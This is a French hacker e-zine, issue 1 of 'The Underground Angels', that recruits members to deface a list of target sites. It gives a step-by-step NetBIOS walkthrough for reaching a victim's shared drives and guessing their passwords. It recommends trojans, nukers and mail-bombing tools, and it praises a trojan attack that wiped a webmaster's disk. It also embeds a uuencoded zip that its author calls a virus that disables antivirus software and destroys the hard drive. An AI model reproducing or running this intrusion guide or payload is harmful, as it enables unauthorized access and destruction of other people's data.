Copy Link
Add to Bookmark
Report

The Underground Angels 1

eZine's profile picture
Published in 
The Underground Angels
 · 4 years ago

  

()-----------------------------------------------------------------()
() -THE- ()
() -UNDERGROUND- ()
() -ANGELS- ()
() http://www.respublica.fr/underground-angels/ ()
()-----------------------------------------------------------------()
| E-Zine N°1 |
|______Par White Angel______|



=====================================================================
Edito
=====================================================================

Bienvenue dans le premier numéro de TUA l'Ezine. TUA est un groupe de
hackers qui ne désire qu'une chose, remettre de l'ordre dans le réseau.
Nous nous ne prenons pas pour des Zorros mais nous hackons des sites bien
définis afin qu'ils cessent de nuire.
Dans ce zine, nous vous exposerons quelques techniques de Hacking, de
Social Engenerring et d'autres petites choses interressantes...
Nous ne verrons pas de cracking ni de carding car cela ne nous servira
à rien (pour l'instant...)
Ici, tout fonctionne de la façon suivante:
-Vous vous inscrivez au groupe
-Vous choisissez une cible dans la "liste"
-Vous vous en référez à moi et je vous donne mon accord
-Vous hackez ce site en expliquant pourquoi vous l'avez hacké et en faisant
un peu de pub pour le groupe.
-Ensuite, si c'est un site qui a enfreint la loi comme un site pédophile,
vous balancerez les webmasters aux gendarmes.
Vous éprouverez ansi une certaine auto-satisfaction.
Voilà... Je vous souhaite une bonne lecture.

White_Angel_TUA@Hotmail.com

=====================================================================
ON RECHERCHE POUR NOTRE GROUPE
=====================================================================

-Des hackers, plein de hackers sous Windows / Linux ou autre...
Vous serez les piliers du groupe. Débutants ou expert, si vous aimez ça,
rejoignez-nous.

-Des graphistes pour le site.
Mes dessins sont un peu miteux les gars...

-Des programmeurs pour créer des logiciels qui nous faciliterons la tâche.
C'est fatiguant de hacker "à la main"

-Un hébergement gratos pour notre site avec accès ftp et http.
Ce serai sympa....

-Des "Chasseurs" pour trouver les sites sensibles
Alors, pour ceux qui n'ont pas peur, vous devrez vous ballader sur le web
pour relever des adresses (pédophile, racistes, ...etc voir la liste.) que
nous mettrons dans une Black list.

-Des taupes dans des entreprises pour des infos interressantes.
Pour être au courant avant tout le monde et taper là ou ça fait mal.

-Des traducteurs (Anglais/Russe/Allemand/Japonais/Chinois/Italien....)
Pour que nous puissions être compris du mond entier.

-Des contacts dans la presse pour exprimer nos idées.
Car la presse et notre "amie" et sera notre voie.

-Des écrivains pour écrire des articles pour le Zine (Tutorials, histoires,
chansons, pensées philosophiques...)
On a besoin de vos talents...

-Des pros de la sécurité pour nous aider à pas nous faire pincer.
Des gars qui pourront foutre des Firewalls partout sur le site et qui pourront
nous expliquer comment détourner tel ou tel système.

-Des codeurs et programmeurs de Démos pour nous faire un super spot de pub...
Là, on est gentils...

Merci et surtout, n'hésitez pas à vous inscrire....
=====================================================================
Ma clé publique si vous voulez m'écrire.
=====================================================================

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: PGP for Personal Privacy 5.0

mQGiBDED2mcRBADei6izty5bfB4qDyckHKHavdClYfElRSxpnk0XLYmOBIGzYlR3
qjynlj/aGH77/5pvX+nQksbKUjWN8DrBsuNwFLJyNvcanmFCH8ntCvBPf3nbpwvO
EzEvl7+tBQ1WgdZO4N3eaMVk8KMGqbnah56Ts8ZmGjBfTvKhFTbi2rXvbwCg/1Vw
SiIAy8+xV79sPoZyhXXA6RkEAM8RNvjKa2GC/kLuA49j9ya+wDeKIN+2cjzZBncH
Q771iabAgekPPGKnAkT6MfYRemK6Sujn3Zju+C1cGEvWTqVKNB4bTgkUkp2t/Ith
dgkelMBIWU8kEnGaNJBWDWhMFEAX8huf8GQxS5/2thM3NIeW9jXCI5oD8zf21Xp9
nfwDA/4jCWljEhj9UtJSvRlRLhri5Fx7pA3ggVxvP1itk9NV6RTA1WRza3gUrWqP
DdT/zqEHyXZr1hOxAVLSav5mZ0YnAy1HUgtCswRfdiNJ2LMCO3ugSKF/Wn9YfTL9
o3DMcsXXdWGNftfeeVxpQBWxoRjOV6v/W9G2HMtuYFImS/IxgLQpV2hpdGUgQW5n
ZWwgPHdoaXRlX2FuZ2VsX3R1YUBob3RtYWlsLmNvbT6JAEsEEBECAAsFAjED2mcE
CwMBAgAKCRD0Bss5ZC7lVIYSAKCHjbHMXTvJRzQApCD3EFhjMxBvEgCfd3E33q5A
m0WrbRDfo6Y7TuQjj9O5Ag0EMQPaaBAIAPZCV7cIfwgXcqK61qlC8wXo+VMROU+2
8W65Szgg2gGnVqMU6Y9AVfPQB8bLQ6mUrfdMZIZJ+AyDvWXpF9Sh01D49Vlf3HZS
Tz09jdvOmeFXklnN/biudE/F/Ha8g8VHMGHOfMlm/xX5u/2RXscBqtNbno2gpXI6
1Brwv0YAWCvl9Ij9WE5J280gtJ3kkQc2azNsOA1FHQ98iLMcfFstjvbzySPAQ/Cl
WxiNjrtVjLhdONM0/XwXV0OjHRhs3jMhLLUq/zzhsSlAGBGNfISnCnLWhsQDGcgH
KXrKlQzZlp+r0ApQmwJG0wg9ZqRdQZ+cfL2JSyIZJrqrol7DVekyCzsAAgIH/0Q/
k0NL1Ug5suw32tHLIfOk2TTNkMsahKZoNe2nIAGnsIZbaITKVzaDO4MkM061DI5U
LRgdV/TeYbeHfdAMN+vf36bup5GWSPfotyEJP9DBfcPG05DawBKe5w7XMlPv6EhE
p2SO72ghM+6JgizdrSWZ6M0U3QF7cwSVCJdo55Jqaany+ClLivQVetdDDDtBSLQc
oH/sGpLp1MjpQceW7yRPIuCMaZ3abi0mgYt1p5KLNgqv0PRbrbwewd2+ZRDSoqvr
b96GYHY6Yn9nbkEEwz5ZfPXCvQpBlE5PRQspwUHtYrsApp5oj0Ay4IpVto3m2t8D
SmkoyyGxQL5WICA6b/OJAD8DBRgxA9po9AbLOWQu5VQRAgz8AKDcMlkNy02F9PVe
IuX4Tlo8YXjExQCdEgXJlsOVhRFHSBEagduwZ37sX6U=
=z1yR
-----END PGP PUBLIC KEY BLOCK-----

=====================================================================
Sommaire
=====================================================================
*Disclaimer
*Comment Hacker un NT
*La Liste
*Un Héro Israëlien
*La Boite à outils du Hacker
*Un petit virus
*Quelques bonnes adresses
*Inscription
*Remerciement

=====================================================================
DISCLAIMER
=====================================================================
Cette partie est selon moi inutile mais bon...
"Ce fichier et tout les autres écrit par White Angel ou un des membres
de The Underground Angels ne doit pas inciter ses lecteurs à faire des
actes illégaux. Ici, tout ce qui est écrit est pour votre information.
En aucun cas les membres de The Underground Angels ne sont responsables
des actes des lecteurs."
Voilà.

=====================================================================
Comment Hacker Un NT
=====================================================================

Repiqué à feu FrHAck parce que grosse flemme, alors merci frHack....

Cette technique fonctionne aussi bien pour Windows 3.11/95/98/NT. Elle
vous permet de rentrer dans les fichiers d'un ordinateur distant en toute
impunité.
Voici comment procéder:
Tout d'abord, vous devez avoir installé le protocole TCP/IP et tout ce
qui est necessaire pour une connexion en réseau. Vous devez donc avoir
l'icone Voisinage réseau sur votre bureau.

D'abord, vous devez avoir l'ip de votre victime (/dns sous IRC ou Infos
sous ICQ...)
Si c'est un serveur, tapez:

ping -n 1 -w 3000 www.victime.com

Ensuite, ouvrez une session dos puis tapez:

C:\WINDOWS>nbtstat -A son_ip

Vous obtiendrez ainsi un truc du genre:

---------------------------------------------------------------------

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
USERNAME <00> UNIQUE Registered
VICTIME <00> GROUP Registered
USERNAME <03> UNIQUE Registered
USERNAME <20> UNIQUE Registered
VICTIME <1E> GROUP Registered
MAC Address = 46-55-53-45-00-00

C:\WINDOWS>

Si la personne fait tourner le client microsoft avec le partage de
fichiers/imprimantes active, c'est ce que vous devriez voir. Sinon,
un message d'erreur peut apparaitre: "Host not found.", il y a deux
causes principales a cette erreur. 1- la personne ne fait pas tourner
le client microsoft ou n'est, tout simplement pas sous windows, donc
c'est normal. 2- quelqu'un sur le reseau utilise le meme nom de machine
que vous, changer le votre en un autre moins probable
(Panneau de Configuration / Reseaux / Identification).
Bon, imaginons que vous ayez du premier coup une reponse favorable de
nbtstat, ce qui nous interresse c'est le Remote <20>, c'est le service
de partage de fichiers, s'il n'y est pas, n'esperez pas pouvoir vous
connecter sur la machine. Pour la petite information, le MAC Address
(Media Access Control), c'est un chip sur les cartes ethernet qui delivre
un numero d'identification
unique pour la carte (qui est egalement simule par le dial-up de windows,
c'est pour ca que la plupart des MAC address que vous verrez seront les memes
;)).
Bon, maintenant que vous connaissez le nom du remote 20, il faut que vous
l'ajoutiez au fichier lmhosts dans le repertoire de windows, si ce nom contient
des espace mettez-le simplement entre guillemets (""). Ce fichier est utilise par
la pile du client Wins (qui fait que le NetBios prime sur le TCP/IP) et contient
la redirection des addresses ip vers des nom d'ordinateurs. Ce fichier est divise
en plusieurs colones, la premiere contient l'addresse ip, la seconde le nom de la
machine hote et la troisieme et les suivantes des directives et/ou des commentaires.
Ce qui differencie le passage d'une colone a une autre c'est au mimimum un espacement.
Chaque
directives et chaque commentaires doit etre precede du signe #, mais ils ne nous
servent a rien pour le moment.

;--- Suite de la Session DOS ---

C:\WINDOWS>echo addresse_ip nom_du_remote_20>>c:\windows\lmhosts
C:\WINDOWS>_

;------

Ici, si vous n'aviez pas de fichier lmhosts existant, remplacez la
redirection par un simple ">" au lieu de ">>". Bon une fois le nouveau host
ajouter, il ne vous reste plus qu'a resetter le cache du netbios

;--- Suite de la Session DOS ---

C:\WINDOWS>nbtstat -R

Successful purge and preload of the NBT Remote Cache Name Table.
C:\WINDOWS>_

;------

Maintenant, il faut savoir quelles sont les ressources partagees sur la machine
hote, pour cela, on va se servir de la commande "net", dont le parametre view permet
(justement) de lister ces ressources.

;--- Suite de la Session DOS ---

C:\WINDOWS>net view \\nom_du_remote_20
Shared resources at \\USERNAME

Sharename Type Comment
-------------------------------------------
A Disk
C Disk
D Disk
HPDeskJet Printer
The command was completed successfully.

C:\WINDOWS>_

;------

Ok, si tout c'est bien passe, vous devriez avoir quelque chose de similaire. Sinon
voila toujours une petites liste des messages d'erreur les plus courant, et comment
en venir a bout.
Error 5: You do not currently have access to this file.
La machine partage des ressources mais vous devez entrer un password pour avoir access.
Pour cela il faut passer par windows (si qlq1 connait un autre moyen, merci :)),
cliquez sur demarer / rechercher / ordinateur (si vous n'avez pas cette option
allez downloader les powertoys sur le site de microsoft). La remplissez le nom
de l'ordinateur par \\nom_du_remote_20 et cliquez rechercher. Une fois que la
machine est trouvee, cliquez deux fois dessus, vous pourrez alors entrer un
password reseau (les premiers a essayer
sont le nom du remote 20, ou un password vide).
Error 53: The computer name specified in the network path cannot be located.
Ici il peut y avoir deux causes, soit vous avez mal introduit des donnees precedement
(dans lmhosts par exemple, ou encore dans la commande "net view"), soit la machine que
vous essayez d'atteindre n'est pas accesible (elle vient de se faire deconnecter).
Error 59: An unexpected network error has occurred. (Disconnected)
Ici, l'erreur et due a un probleme lors de la transmission des donnees entre vous et
la machine PENDANT l'execution de la commande "net view".
Error 86: The specified network password is not correct.
Le password que vous venez d'entrer (via le dos), n'est pas valide.
Error 3787: You must log on before performing this operation. (Find)
Cette erreur reste un demi mystere, elle est due au fait que windows 95 pense, lors
de votre premiere tentative d'utiliser "net view" que vous n'est pas loguer sur le
reseaux. Pour ne plus avoir ce probleme durant la meme session internet, cliquez sur
démarrer / rechercher / ordinateur (si vous n'avez pas cette option allez downloader
les powertoys sur le site de microsoft). La remplissez le nom de l'ordinateur
par \\nom_du_remote_20 et cliquez rechercher. Une fois que la machine est trouvee,
cliquez deux fois dessus, vous pourrez alors relance la commande "net view" sans messages
d'erreurs.


=====================================================================
La Liste
=====================================================================

-Sites pédophiles
(Sites à dénoncer aux autorités)
-Sites Racistes
(A Détruire)
-Sites Nazis (SS, FN....)
(A Détruire)
-Sites de pays ou les droits de l'homme ne sont pas respectés.
(A Détruire)
-Sites pronant l'exclavagisme (Hommes, Femmes, Enfants...)
(A Détruire)
-Sites de sociérés utilisant des animaux pour des expériences ou pour des fourrures.
(A Détruire et à dénoncer aux autorités)
-Des grosses entreprises dangereuses (Microsoft, France Télécom)
(Ne pas détruire mais plutôt s'en servir comme passerelle pour d'autres choses
plus interessantes...)
-Sites de sectes (Eglise de la Scientologie...)
(A Détruire et à dénoncer aux autorités si il y a une chance qu'elle soit inculpable)
-Sites sataniques...
(A Détruire)
-Autres sites empécheur de tourner en rond....
(On verra...)

=====================================================================
Un Héro Israélien
(Une News que j'ai reçu...)
=====================================================================
14 ans !!! Comme quoi on peut être très jeune et avoir de bonnes idées. Nir Zigdon
est un jeune Israélien qui vit dans la banlieue de Jérusalem. Un jour il découvre
que le site Irakien "Iraq.com" diffuse des infos mensongères sur la Palestine et sur
les USA ansi que de la propagande anti-sémite. Il décide donc de se venger.
Il contacte le webmaster d'Iraq.com, Fawzi El-Faramawy, un étudiant égyptien de 26 ans
habitant à New York. Nir donne donc un faux nom et se fait passer pour un palestinien
fan de Saddam Hussein. Il propose à El-Faramawy de détruire tout les sites Israeliens
en lui envoyant un logiciel conçu à cet usage. Il s'agit en fait d'un virus que Nir avait
programmé. Le webmaster le récéptionne et l'éxecute. Le cheval de troie est alors actif.
Il détruit toutes les données du HD et donc par conséquent tout le site Iraq.com.
Fawzi El-Faramawy se mange un savon du tonnerre et Nir Zigdon devient un héro national
en Israël. Il paraitrait même qu'il aurait forcé quelques sites militaires "Secret Défense".
Quelque chose me dit qu'on va encore entendre parler de lui...

``'''''!!!!!~=%*%%j%%&&&:
````;8UA4AAU3 'S' '' `%*=
` ``` '$UU#A4A4S:''#@ @NNNNNNNNNHHUj!~~~~''''''!
```''8#Uj`'! %%!'@H@ ` NNNNNNHNHNHH@H#3==;;=;:j
``:=''`!8~'jHNNHHRR@HHHHHHNHNNNMNNNNNNHHHR$$3$SSU
!&'!HHMNMHHHH@H@NRHNHHNHNHHHNHHHNNNNNNMN43$S$SU
!HNMHNMMMHHNNNHHNN#AHHNNHNH833jj;::!;=SHMNHS$$$$U
RNHHHNNNNNNMNMNNNNNMMNNH43=!!!~~~~~!!::=:*SNN=*;;j
!@HHHHNH@HNMNNMN@###SU&;:!:!'``'~~~~~!!:!;;=j4=;=j
!HNNNNNMNHNNMNNA@HH@#%&:!!!!''''~'!!~!!~~~:;;=$j*j
'3NNMHNNMNNNMNHNNNN#3=::::!!~~!~!!!'!!~!~!!!:;%$%$
`!MNMNMMNMMNNHH@HRAj3&*;;=::!!!~!~~'~'~'~'~!::;3j3
'~$NMMMMMNNMNMHNHRRS;;;:::::!~''''~'``'''''~~:8H$%
''~NNNNMMMNHHNH@HH8&=;;;=~'!~'!~'~~!!~~~~!:;%HA&''
''~SNMNNNHNHNNU@4j&*=:::*$S4S@A@###UUj;'''!SNj@R`'
''%4S=:=NHN@HHA3=;:;::*$%=;*4H@HHNH4$j=~ %$3$!``
'`3Sj*$S**j@R#4$;::!:;&;j4SHNNH 'j:!!!!:' !:!'`
`''&;j8UUUj%U4$;:!!!!!::::;;=&~!!::!``''''``':::
''''&;&;;3!:=*;:&;:::!!!!!~!!~!!:'''~''``'` ~'''
'~~!::**~:$:*&=====;!~!!~~~'` ````'~~!!~~'` `~!!
!!!:!:::;::~:&&%&&*=:::!:!~~'`' '~!:!!'`'!'!~''!;!
!!!:::===S84R8%%*==:;;=;::!!!:!:::!!~~%8848U$;=;N@
!!!:;=;&=%8S3$S&&%&;=====;:==;:::=::!!'::;*;%*3@NH
!!::;;&&%3$U8jS8&%*===;=&==&;;*&&*;:!!'!$$8S$&NNNN
!::;***%%j$$44SSUS$%&&&j=&%&====;&;;;=*&:;%%%@NMHN
:::;:&%%%SN4344S4URA4$$j3$%&j&&*==;&%$#HHHU3jMNNNH
;:::=&&3HMNH4S$S44R@@@NHRA4S333%*=&;=!:!!==*@NNHN#
::;;&&%NNHNMHNS$$SR48@HNHNNNNHHAS%%=:::==%UNMNMNN4
::;;&%NNMMNNMMMMNNNNNH#4#NMMNNNHH#@@#4NHNMMMNNNNNS
=*&*$NMNNNNNNNNMNNNNNNNNNNNNNNNH@##@#S#NNNNNNMMMH3
*=%jNNNNNNNNNHNNNNNNNNHNNNMNNNNNMNN#@U3NNNNNHNNNH~
%&3NNNMNNNNNHNNNNNNNNNHNNNNNNNNNNNNHNNNNNNHHNNMMj`
jjHNNHMHHNNHNNNNHNHNNNNNHNNNNHNNNNNNNNNHNHHNNHH::
j$NHHN@NNHHNNNHNHNHHNNNNNHNNHNNHNNHNHNNNNNNNNNNS`
3HNHHNNNHHNNHNHNHHHNHHHHHNHNHNNNHHHNNNNNHHNNNNNN!
$NNNNHN@HHHNHNHHNNHNHHNNNNNNHMNNHNNNNHNNNHNNNNHM@

Nir Zigdon posant pour les Journalistes
(Prenez un peu de recul pour bien voir la photo)


=====================================================================
La boite à outils du Hacker
=====================================================================

Voici une liste assez complète pour faire face à toutes les situations.
Tout d'abord, il vous faut un E-mail que vous utiliserez pour vos affaires illégales
(Pas de vrai nom ni d'adresse, juste un pseudo...)
(Hotmail est un très bon exemple).
-Un N° ICQ
-Un crackeur de password
-Plusieur Nukers
-Des patchs, un firewall et des outils de surveillance pour ne pas vous faire hacker.
-Une Ip non fixe (qui change à chaque connexion)
-Un carnet et un stylo pour noter les infos utiles
-Un client FTP
-Un masqueur d'ip ou un anonymiseur. (ex: www.anonymizer.com)
-Un bon modem
-Un accès Internet hors de chez vous (Etablissement scolaire, Cybercafé...etc)
-Un logiciel de mail bombing
-Quelques bon virus
-Des Trojans (Netbus, BO...)
-Un client IRC (Mirc...etc)
-...etc



=====================================================================
Un petit virus
=====================================================================
Ce virus que j'ai crée se prénomme TUA.com.
Il désactive les anti-virus et détruit le HD.(Théoriquement car je l'ai pas essayé)
(EN FORMAT UUE)

_=_
_=_ Part 001 of 001 of file TUA.zip
_=_

begin 666 TUA.zip
M4$L#!!0``@`(`#=\,R0#)J?%)P,``,(#```'````5%5!+D-/385236C38!A^
MOWQ)JT@C6E04;1JV!5'Z*2OSL+%J-T9%Y^Q^='_,.CR(B`C:X&6'%$6<T3(O
M>IEZ<'@3?X@S35U75Q2L?"AZ$8>BPT-F\;0A.&OCE_F')P,)>;[GS?.^S_/&
M!M#+V_10ZC-&1(M$42;9D)GB+^:BR$*@A6Y_6>4(7U95!$=("9T)33@5BY6$
M$:.5RL8R*L^\72S>R[ZM0[&9KV:Q2&7-*283]E+.;N'L#YS-8U.NHW)D^-H`
MCEPXF\!BS\YT7M$#&$3OZ5+C2*KTBC=V43F[7#!V4MDEGW@0+-F1SE\<!S0)
M*#.%1:D\-V:]0*9<XY&8VOF;79B<4P!%]+/[,+F!D`G(>:^5=R>W:N45R8U:
M>66RJK%85+D'1>*0`5SH;U-WMPP$VT@':24Q$HSV=41;6F>/<:,']W?O\P1$
MR:QF@U[P#.+AP"%L5M=8;9C*DG<@<6#PZJ\B$YJI3(;%?FRBYO!3*IM<(Y7U
MUR9T+YYW8S*\NA>3*G&2)PWLH>+9*V!R3?8;$*40!G*C'9O09#]CT-B>P6!U
ML28D%>G">_I47#HZXK*W7'9'!H'5R5CVQH'5CMUN3?8EQHG><HY%,\^S:.;&
MV!(FFX5?.W!!G;"XO5.I4&?"\55\;(OLUH3;L=B,S=2FL#7/,S74371W9-T=
M>1F;EO6*_+%\D%ED?#_K._C;?G5-=A"GI[.'_B8S>[T2?AI^2>5";?XYP"P-
MPK^7L8D9K+\\P2>7$"TWP0?5S:1^//<3YGB?NM[P4?D.EW$<"X`J?Y'C4*5@
M:M?3>1-Q;AH:A*>IGVW*/<N]PV$G<P3FQA9A>-I$N/8SJ[F+LDS'7U@(Y],O
M'L*0/A_WQJ5OH_'VCH#'X.DZ4K^-M5_JE?IZ>ZZ6JD;"+UG`Y@I\3\M"/%V@
M_I-\[4?JKSS1*OR)CY7'I7=,*9^%(8.[@^ZB^S".[FG4_PF&F+L0^^47//\S
M@1:LEEZ6T:AH'_]^)J]&XYT>HYW*Z8+2$%@-*M'?G/?&C2U4[JGD57RZX%7T
MV)H:"4BMYQ&O+E>TPVO>*ZGC&Z:PLC8F>?M[G@=]`0C\`%!+`0(4`!0``@`(
M`#=\,R0#)J?%)P,``,(#```'````````````(`#_@0````!454$N0T]-4$L%
3!@`````!``$`-0```$P#````````
`
end


=====================================================================
Quelques bonnes adresses
=====================================================================

Une petite liste de sites FTP
(Je les ai pas tous fait :-))

204.215.84.2 /pub/dmackey
2600.com (2600 Magazine)
aeneas.mit.edu (Kerberos)
alex.sp.cs.cmu.edu /links/security (Misc)
asylum.sf.ca.us (CyberWarriors of Xanadu)
athena-dist.mit.edu /pub/ATHENA (Athena Project)
atlantis.utmb.edu (Anti-virus)
bellcore.com (Bellcore)
cert.org (CERT)
ciac.llnl.gov (CIAC)
clark.net /pub/jcase (H/P)
cnit.nsk.su /pub/security (Security)
coast.cs.purdue.edu /pub (Security/COAST)
coombs.anu.edu.au /pub/security (Security)
csrc.ncsl.nist.gov (NIST Security)
dartmouth.edu /pub/security (Security)
ds.internic.net (Internet documents)
dutiws.twi.tudelft.nl /pub/novell
etext.archive.umich.edu /pub/Zines/PrivateLine (PrivateLine)
fastlane.net /pub/nomad
ftp.3com.com /pub/Orange-Book (Orange Book)
ftp.acns.nwu.edu /pub (Mac Anti-virus)
ftp.acsu.buffalo.edu /pub/security & /pub/irc (Security & IRC)
ftp.alantec.com /pub/tcpr (Tcpr)
ftp.armory.com /pub/user/kmartind (H/P)
ftp.armory.com /pub/user/swallow (H/P)
ftp.auscert.org.au /pub (Australian CERT)
ftp.cerf.net /pub/software/unix/security (CERFnet)
ftp.cert.dfn.de (FIRST)
ftp.cisco.com (Cisco)
ftp.commerce.net /pub/standards/drafts/shttp.txt(Secure HyperText)
ftp.cs.colorado.edu
ftp.cs.ruu.nl /pub/SECURITY (Security & PGP)
ftp.cs.uwm.edu /pub/comp-privacy (Privacy Digest)
ftp.cs.vu.nl
ftp.cs.yale.edu
ftp.csi.forth.gr /pub/security
ftp.csl.sri.com /pub/nides (SRI)
ftp.csn.org /mpj (Cryptology)
ftp.csua.berkeley.edu /pub/cypherpunks (Crypto)
ftp.delmarva.com
ftp.demon.co.uk /pub/misc/0800num.txt (0800/0500 numbers)
ftp.digex.net /pub/access/dunk
ftp.dsi.unimi.it /pub/security/crypt (Crypto)
ftp.ee.lbl.gov
ftp.eff.org /pub/Publications/CuD (EFF)
ftp.elelab.nsc.co.jp /pub/security (Security)
ftp.etext.org (Etext)
ftp.fc.net /pub/deadkat (TNO)
ftp.fc.net /pub/defcon (DefCon)
ftp.fc.net /pub/defcon/BBEEP (BlueBeep)
ftp.fc.net /pub/phrack (Phrack)
ftp.foobar.com
ftp.funet.fi /pub/doc/CuD
ftp.gate.net /pub/users/laura
ftp.gate.net /pub/users/wakko
ftp.giga.or.at /pub/hacker/ (H/P)
ftp.greatcircle.com /pub/firewalls (Firewalls)
ftp.IEunet.ie /pub/security (Security)
ftp.ifi.uio.no
ftp.indirect.com /www/evildawg/public_access/C&N/
ftp.info.fundp.ac.be
ftp.informatik.uni-hamburg.de
ftp.informatik.uni-kiel.de /pub/sources/security
ftp.inoc.dl.nec.com /pub/security (Security)
ftp.isi.edu
ftp.lava.net /users/oracle/ (H/P)
ftp.leo.org/pub/com/os/os2/crypt
ftp.lerc.nasa.gov /security
ftp.llnl.gov /pub (CIAC)
ftp.luth.se /pub/unix/security
ftp.lysator.liu.se
ftp.mcs.anl.gov /pub/security
ftp.microserve.net /ppp-pop/strata/mac (Mac)
ftp.near.net /security/archives/phrack (Zines)
ftp.nec.com
ftp.netcom.com /pub/br/bradleym (Virii)
ftp.netcom.com /pub/da/daemon9 (H/P)
ftp.netcom.com /pub/fi/filbert
ftp.netcom.com /pub/gr/grady
ftp.netcom.com /pub/il/illusion (H/P+Virus)
ftp.netcom.com /pub/je/jericho (H/P)
ftp.netcom.com /pub/le/lewiz (Social Engineering)
ftp.netcom.com /pub/ty/tym (TYM)
ftp.netcom.com /pub/va/vandal (DnA)
ftp.netcom.com /pub/wt/wtech/
ftp.netcom.com /pub/zi/zigweed (H/P)
ftp.netcom.com /pub/zz/zzyzx (H/P)
ftp.netsys.com
ftp.ocs.mq.edu.au /PC/Crypt (Cryptology)
ftp.ox.ac.uk /pub/comp/security
ftp.ox.ac.uk /pub/crypto (Cryptology)
ftp.ox.ac.uk /pub/wordlists (Wordlists)
ftp.paranoia.com /pub/toneloc/tl110.zip (ToneLoc)
ftp.pipex.net /pub/areacode (uk areacodes)
ftp.pop.psu.edu
ftp.primenet.com /users/i/insphrk
ftp.primenet.com /users/k/kludge (H/P)
ftp.primenet.com /users/s/scuzzy (Copy Potection)
ftp.primus.com /pub/security (Security)
ftp.psy.uq.oz.au
ftp.psy.uq.oz.au /pub/DES
ftp.rahul.net /pub/conquest/DeadelviS/script/vms/
ftp.rahul.net /pub/lps (Home of the FAQ)
ftp.sert.edu.au
ftp.sgi.com
ftp.smartlink.net /pub/users/mikes/haq
ftp.std.com /archives/alt.locksmithing (Locksmithing)
ftp.std.com /obi/Mischief/ (MIT Guide to Locks)
ftp.std.com /obi/Phracks (Zines)
ftp.sunet.se /pub/network/monitoring (Ethernet sniffers)
ftp.sura.net /pub/security (SURAnet)
ftp.technet.sg
ftp.technion.ac.il
ftp.tis.com /pub (TIS)
ftp.tisl.ukans.edu /pub/security
ftp.uni-koeln.de (Wordlists)
ftp.uspto.gov
ftp.uu.net /doc/literary/obi/Phracks (Zines)
ftp.uwp.edu /pub/dos/romulus/cracks (Copy Protection)
ftp.vis.colostate.edu
ftp.vix.com
ftp.vortex.com
ftp.warwick.ac.uk /pub/cud (Zines)
ftp.wi.leidenuniv.nl /pub/security
ftp.win.tue.nl /pub/security (Security)
ftp.winternet.com /users/nitehwk (H/P)
ftp.wustl.edu /doc/EFF (EFF)
ftp.zoom.com
ftp.zrz.tu-berlin.de/pub/security/virus/texts/crypto (Cryptology)
garbo.uwasa.fi /pc/crypt (Cryptology)
gemini.tuc.noao.edu /pub/grandi
gti.net /pub/safetynet
gumby.dsd.trw.com
hack-this.pc.cc.cmu.edu (Down for Summer)
heffer.lab.csuchico.edu (Third Stone From The Sun)
hplyot.obspm.fr
info.mcs.anl.gov
infonexus.com /pub (The Guild)
jerico.usc.edu
l0pht.com (The L0pht)
lcs.mit.edu /telecom-arc (Telecom archives)
lod.com (Legion of Doom)
mac.archive.umich.edu
mary.iia.org /pub/users/patriot (Misc)
monet.ccs.itd.umich.edu
net-dist.mit.edu /pub/pgp
net.tamu.edu /pub/security/TAMU (Security)
net23.com /pub (Max Headroom)
nic.ddn.mil /scc (DDN Security)
nic.sura.net /pub/security
oak.oakland.edu /pub/hamradio (Ham Radio)
oak.oakland.edu /SimTel/msdos/sound (DTMF decoders)
oak.oakland.edu /SimTel/msdos/sys (BIOS attackers)
parcftp.xerox.com
pyrite.rutgers.edu /pub/security (Security)
relay.cs.toronto.edu /doc/telecom-archives (Telecom)
rena.dit.co.jp /pub/security (Security)
research.att.com /dist/internet_security (AT&T)
ripem.msu.edu /pub/crypt (Ripem)
rmii.com /pub2/KRaD (KRaD Magazine)
rtfm.mit.edu (Etext)
rtfm.mit.edu /pub/usenet-by-group (Usenet FAQ's)
scss3.cl.msu.edu /pub/crypt (Cryptology)
sgigate.sgi.com /Security (SGI Security)
sierra.stanford.edu
spy.org (CSC)
src.doc.ic.ac.uk /usenet/uk.telecom (uk.telecom archives)
suburbia.apana.org.au /pub/unix/security (Security)
sunsolve1.sun.com
theta.iis.u-tokyo.ac.jp /pub1/security (Security)
titania.mathematik.uni-ulm.de /pub/security (Security)
toxicwaste.mit.edu /pub/rsa129/README (Breaking RSA)
ugle.unit.no
unipc20.unimed.sintef.no
vic.cc.purdue.edu
vixen.cso.uiuc.edu /security
web.mit.edu
whacked.l0pht.com (Mac + H/P)
wimsey.bc.ca /pub/crypto (Cryptology)
wuarchive.wustl.edu /pub/aminet/util/crypt

---------------------------------------------------------------------

Quelques sites www


134.220.198.66:8000 (Peter Strangman's)
alcuin.plymouth.edu/~jay/underground.html (Underground Links)
all.net (American Society for Industrial Security Management)
alumni.caltech.edu/~dank/isdn/ (ISDN)
asearch.mccmedia.com/www-security.html (WWW-security info)
aset.rsoc.rockwell.com (NASA/MOD AIS Security)
aset.rsoc.rockwell.com/exhibit.html (Tech. for Info Sec)
att.net/dir800 (800 directory)
ausg.dartmouth.edu/security.html (UNIX Security Topics)
bianca.com/bump/ua (Unauthorized Access Home Page)
ccnga.uwaterloo.ca/~jscouria/gsm.html (GSM Specification)
cell-relay.indiana.edu/cell-relay (Cell Relay Retreat)
ciac.llnl.gov (CIAC Web Site)
community.net/community/all/home/solano/sbaldwin
cs.purdue.edu/homes/spaf/coast.html
(The COAST Project and Laboratory)
csbh.mhv.net/dcypher/home.html (Dcypher's Home Page)
csrc.ncsl.nist.gov (NIST)
cwix.com/cwplc (Cable and Wireless)
daemon.apana.org.au/~longi/
dcpu1.cs.york.ac.uk:6666/fisher/telecom
(Embryonic Telephone History Page)
dfw.net/~aleph1 (The Uebercracker's Security Web)
draco.centerline.com:8080/~franl/crypto.html (Crypto)
draco.centerline.com:8080/~franl/privacy/bacard-review.html
enigma.pc.cc.cmu.edu/~caffeine/home.html (Caffeine's Home Page)
everest.cs.ucdavis.edu/Security.html (UCDavis.edu Security Page)
everest.cs.ucdavis.edu/slides/slides.html (Security Lab Slides)
ezinfo.ethz.ch/ETH/D-REOK/fsk/fsk_homepage.html (CSSCR)
fastlane.net/homepages/thegnome (Simple Nomad)
first.org (FIRST)
freeside.com/phrack.html (Phrack Magazine)
frosted.mhv.net/keytrap.html
ftp.arpa.mil (ARPA home page)
ftp.tamu.edu/~abr8030/security.html (Security)
grove.ufl.edu/~bytor (Bytor home page)
hightop.nrl.navy.mil/potpourri.html (MOD Security)
hightop.nrl.navy.mil/rainbow.html (MOD Rainbow Books)
ice-www.larc.nasa.gov/ICE/papers/hacker-crackdown.html (Sterling)
